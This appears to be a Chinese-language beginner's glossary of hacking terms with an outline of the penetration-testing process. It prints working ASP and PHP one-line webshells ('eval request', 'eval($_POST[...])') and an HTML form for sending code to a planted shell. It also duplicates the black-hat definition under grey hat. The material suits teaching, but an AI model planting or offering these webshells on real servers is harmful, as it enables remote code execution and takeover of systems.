1、白帽子
专门研究或者从事网络安全行业的人,通常受雇于各大安全公司,是提高网络、系统安全水平的主要力量
2、黑帽子
专门研究木马、操作系统、寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。
3、灰帽子
专门研究木马、操作系统、寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。
术语词汇介绍
1、脚本(asp、php、jsp)
2、Html(css、js、HTML)
3、HTTP协议
4、CMS(B/S)
5、MD5
6、肉鸡:被黑客入侵并被长期驻扎的计算机或服务器
7、抓鸡:利用使用大量的漏洞,使用自动化方式获取肉鸡的行为。
8、Webshell:通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制。
9、漏洞:硬件、软件、协议等可利用的安全缺陷,可能被攻击者利用,对数据进行篡改,控制等。
10、一句话木马:通过向服务端提交一句简短的代码,配合本地客户端实现Webshell功能的木马。
<%eval request(“pass”)%>
<%execute(request(“pass”))%>
Request(“pass”)接收客户端提交的数据,pass为执行命令的参数值。
eval/execute 函数执行客户端命令的内容。
11、php一句话木马:
<?php eval($_POST[cracer]);?>
下面的代码可以用POST的方式提交PHP语句,利用php脚本的各种函数,就可以实现执行系统命令、修改数据库、增删改文件等各种功能。
<from method=post action=http://木马地址>
<textarea name=cracer>
//这里写PHP代码
phpinfo();
</textarea>
<input type=submit>
</from>
12、提权:操作系统低权限的账户将自己升为管理员权限使用的方法
13、后门:黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”
14、跳板:使用肉鸡IP来实现攻击其他目标,一遍更好的隐藏自己的身份信息。
15、旁站入侵:同服务器下的网站入侵,入侵之后可以通过提权、跨目录等手段拿到目标网站的权限。常见的旁站查询工具:WebRobot、御剑、明小子和Web在线查询等。
16、C端入侵:同C段下服务器入侵。利用一些黑客工具嗅探获取在网络上传输的各种信息。常用的工具有Windows下Cain,Linux下Sniffit、Snoop、Tcpdump、Dsniff等。
渗透测试流程:
1、明确目标:
确定范围、确定规则、确定需求
2、收集信息:
基础信息、系统信息、应用信息、版本信息、服务信息、人员信息、防护信息
3、漏洞探测:
系统漏洞、WebServer漏洞、Web应用漏洞、其他端口服务漏洞、通信安全
4、漏洞验证:
自动化验证、手工验证、试验验证、登录猜解、业务漏洞验证、公开资源的利用
5、信息整理:
整理渗透工具、整理收集信息
6、信息分析:
精准打击、绕过防御机制、制定攻击路径、绕过检测机制
7、获取所需:
实施攻击、获取内部信息、进一步渗透、持续性存在、清理痕迹
8、形成报告:
按需整理、补充介绍、修补建议。
网友评论